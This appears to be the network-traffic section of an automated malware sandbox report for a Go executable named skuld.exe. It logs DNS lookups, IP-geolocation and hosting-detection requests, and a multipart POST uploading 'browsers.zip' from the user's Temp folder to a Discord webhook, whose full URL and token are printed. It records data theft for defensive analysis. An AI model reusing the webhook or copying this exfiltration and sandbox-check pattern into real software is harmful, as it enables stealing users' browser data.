                                                                                                                                          Mar 12, 2025 10:40:47.227008104 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:47.227019072 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.227036953 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:47.227041006 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.826724052 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:47.831422091 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.831512928 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:47.831756115 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:47.836404085 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:48.297143936 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:48.351603031 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:49.248801947 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:49.248852968 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:49.248925924 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:49.249399900 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:49.249413013 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:49.313220978 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:49.313327074 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:49.313402891 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:49.314567089 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:49.314599991 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.055202007 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.055655003 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.055655003 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.055690050 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.055712938 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.057068110 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.057178020 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.084177971 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.084471941 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.084492922 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.084705114 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.084712029 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.085767031 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.086009979 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.150815964 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.150823116 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.150944948 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.150959969 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.150993109 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.151026964 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.151283026 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.191432953 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.191443920 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.191462040 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.191483974 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.239173889 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.239924908 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.748188972 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.748280048 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.748522997 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.748522997 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.749495983 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.749516964 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.809875965 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.809947014 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.811224937 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.811254978 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.823474884 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.823662996 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824012995 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824012995 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824031115 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.824040890 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.252554893 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:53.259449959 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.358484983 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.403986931 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:23.363704920 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:23.368418932 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:23.778182983 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778228045 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:23.778315067 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778594971 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778613091 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.427510977 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.427841902 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.427869081 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.428066969 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.428073883 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.429327965 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.429430008 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472434044 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472640038 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472642899 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472680092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472754002 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472758055 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472769976 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472925901 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472925901 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472958088 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472971916 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472990990 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473032951 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473058939 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473062038 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473097086 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473119020 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473212957 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473227024 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473259926 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473273993 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256261110 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256798983 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256833076 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256850958 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.256881952 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256928921 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.256943941 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256992102 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.257042885 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257090092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257090092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257108927 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.257118940 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.266241074 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266285896 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.266355991 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266654015 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266669989 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009526968 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009717941 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.009732962 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009816885 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.009823084 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.010941982 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.011025906 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.012103081 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.012172937 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.012197018 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.056330919 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.057717085 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.057734013 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.103758097 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.536643028 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.553750038 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.553909063 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.553988934 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.554008961 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.554019928 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.554027081 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:52.876089096 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:52.876178026 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:52.876204014 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:52.880888939 CET8049705208.95.112.1192.168.2.18

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Mar 12, 2025 10:40:45.085470915 CET5985653192.168.2.181.1.1.1
                                                                                                                                          Mar 12, 2025 10:40:45.092153072 CET53598561.1.1.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.816524029 CET5179053192.168.2.181.1.1.1
                                                                                                                                          Mar 12, 2025 10:40:47.825690985 CET53517901.1.1.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:49.212600946 CET4927753192.168.2.181.1.1.1
                                                                                                                                          Mar 12, 2025 10:40:49.222281933 CET53492771.1.1.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:49.301820993 CET6128953192.168.2.181.1.1.1
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET53612891.1.1.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.258564949 CET6313053192.168.2.181.1.1.1
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET53631301.1.1.1192.168.2.18

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Mar 12, 2025 10:40:45.085470915 CET192.168.2.181.1.1.10x67f2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:47.816524029 CET192.168.2.181.1.1.10xc6dbStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.212600946 CET192.168.2.181.1.1.10xe492Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.301820993 CET192.168.2.181.1.1.10x4816Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.258564949 CET192.168.2.181.1.1.10x5e62Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Mar 12, 2025 10:40:45.092153072 CET1.1.1.1192.168.2.180x67f2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:45.092153072 CET1.1.1.1192.168.2.180x67f2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:45.092153072 CET1.1.1.1192.168.2.180x67f2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:47.825690985 CET1.1.1.1192.168.2.180xc6dbNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.222281933 CET1.1.1.1192.168.2.180xe492No error (0)api.gofile.io51.91.7.6A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.222281933 CET1.1.1.1192.168.2.180xe492No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET1.1.1.1192.168.2.180x4816No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET1.1.1.1192.168.2.180x4816No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET1.1.1.1192.168.2.180x4816No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET1.1.1.1192.168.2.180x4816No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:40:49.309405088 CET1.1.1.1192.168.2.180x4816No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET1.1.1.1192.168.2.180x5e62No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET1.1.1.1192.168.2.180x5e62No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET1.1.1.1192.168.2.180x5e62No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET1.1.1.1192.168.2.180x5e62No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                          Mar 12, 2025 10:41:26.265526056 CET1.1.1.1192.168.2.180x5e62No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • api.ipify.org
                                                                                                                                          • api.gofile.io
                                                                                                                                          • discord.com
                                                                                                                                          • ip-api.com

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1849705208.95.112.1807148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Mar 12, 2025 10:40:47.831756115 CET111OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                          Host: ip-api.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          Mar 12, 2025 10:40:48.297143936 CET175INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:47 GMT
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Content-Length: 6
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          X-Ttl: 60
                                                                                                                                          X-Rl: 44
                                                                                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                                                                                          Data Ascii: false
                                                                                                                                          Mar 12, 2025 10:40:53.252554893 CET95OUTGET /json HTTP/1.1
                                                                                                                                          Host: ip-api.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          Mar 12, 2025 10:40:53.358484983 CET483INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:52 GMT
                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                          Content-Length: 306
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          X-Ttl: 54
                                                                                                                                          X-Rl: 43
                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}
                                                                                                                                          Mar 12, 2025 10:41:23.363704920 CET6OUTData Raw: 00
                                                                                                                                          Data Ascii:


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1849704104.26.13.2054437148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-12 09:40:46 UTC94OUTGET / HTTP/1.1
                                                                                                                                          Host: api.ipify.org
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:40:47 UTC426INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:46 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 12
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Origin
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 91f255016cb796ee-MIA
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13763&min_rtt=13282&rtt_var=5943&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=709&delivery_rate=169050&cwnd=250&unsent_bytes=0&cid=caf212e1a1364a18&ts=501&x=0"
                                                                                                                                          2025-03-12 09:40:47 UTC12INData Raw: 37 33 2e 35 37 2e 31 30 31 2e 39 35
                                                                                                                                          Data Ascii: 73.57.101.95


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.184970651.91.7.64437148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-12 09:40:51 UTC103OUTGET /getServer HTTP/1.1
                                                                                                                                          Host: api.gofile.io
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:40:51 UTC1146INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.27.1
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:51 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Content-Length: 14
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Origin-Agent-Cluster: ?1
                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                          X-Download-Options: noopen
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          2025-03-12 09:40:51 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                          Data Ascii: error-notFound


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.1849707162.159.136.2324437148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-12 09:40:51 UTC321OUTPOST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
                                                                                                                                          Host: discord.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Content-Length: 702
                                                                                                                                          Content-Type: multipart/form-data; boundary=588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:40:51 UTC702OUTData Raw: 2d 2d 35 38 38 66 36 63 65 39 39 38 66 30 63 65 32 32 65 32 61 63 35 33 36 65 38 34 30 31 33 33 30 66 38 62 66 63 34 35 34 65 33 61 66 35 30 34 37 64 32 31 65 65 61 65 62 36 66 64 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 6e 6f 72 64 69 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 62 72 6f 77 73 65 72 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 05 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 2d 2d 35 38 38 66 36 63 65 39 39 38
                                                                                                                                          Data Ascii: --588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57Content-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\browsers.zip"Content-Type: application/octet-streamPK--588f6ce998
                                                                                                                                          2025-03-12 09:40:51 UTC1122INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:51 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: __dcfduid=1615d54cff2611efa9d7968e1d4a0ad4; Expires=Mon, 11-Mar-2030 09:40:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                          x-ratelimit-reset: 1741772452
                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                          vary: Accept-Encoding
                                                                                                                                          via: 1.1 google
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          cf-cache-status: DYNAMIC
